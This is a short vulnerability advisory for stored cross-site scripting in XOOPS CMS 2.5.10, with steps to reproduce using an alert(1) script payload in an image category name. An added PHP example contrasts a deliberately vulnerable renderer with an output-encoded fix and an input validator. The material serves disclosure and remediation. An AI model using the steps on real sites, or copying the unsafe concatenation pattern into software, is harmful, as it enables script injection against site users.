Exploits / Vulnerability Discovered: 2023-06-14
Type: webapps
Platform: php
This exploit / vulnerability, XOOPS CMS 2.5.10 stored cross-site scripting (XSS) (authenticated), is for educational purposes only; if it is used, you do so at your own risk!
1) Log in to the admin panel, click Image Manager, and choose Add Category:
https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images
2) Write your payload in the Category Name field and submit:
Payload: <script>alert(1)</script>
3) After clicking multiupload, when you move the mouse over the payload name, you will see the alert pop up:
https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2
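
The fix for the behaviour in steps 2 and 3 is to encode the stored category name at output time. The following is an added example, not XOOPS code and not part of the original advisory, showing the vulnerable rendering pattern beside a hardened one. The function names, the link markup and the 100-byte length limit are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: XOOPS's own rendering code is not shown on the page.

/** Encode untrusted text for HTML body or quoted-attribute context. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Input-side check (defence in depth): reject markup and control characters. */
function validateCategoryName(string $name): string
{
    $name = trim($name);
    if ($name === '' || strlen($name) > 100) { // assumed limit
        throw new InvalidArgumentException('Category name must be 1-100 bytes.');
    }
    if (preg_match('/[<>\x00-\x1F\x7F]/', $name) === 1) {
        throw new InvalidArgumentException('Category name contains disallowed characters.');
    }
    return $name;
}

/** Vulnerable pattern: the stored value is concatenated into markup unchanged. */
function renderCategoryUnsafe(int $id, string $name): string
{
    return '<a href="admin.php?fct=images&amp;op=multiupload&amp;imgcat_id=' . $id
        . '" title="' . $name . '">' . $name . '</a>';
}

/** Hardened pattern: every use of the stored value is encoded when it is output. */
function renderCategorySafe(int $id, string $name): string
{
    return '<a href="admin.php?fct=images&amp;op=multiupload&amp;imgcat_id=' . $id
        . '" title="' . e($name) . '">' . e($name) . '</a>';
}

// Constructed sample: the category name from step 2 as read back from storage.
$stored = '<script>alert(1)</script>';

echo renderCategoryUnsafe(2, $stored), PHP_EOL; // markup reaches the browser intact
echo renderCategorySafe(2, $stored), PHP_EOL;   // name is shown as inert text

try {
    validateCategoryName($stored);
} catch (InvalidArgumentException $ex) {
    echo 'rejected: ', $ex->getMessage(), PHP_EOL;
}
```

Output encoding is the primary control because it also neutralises names already stored before the fix; the input check only stops new ones.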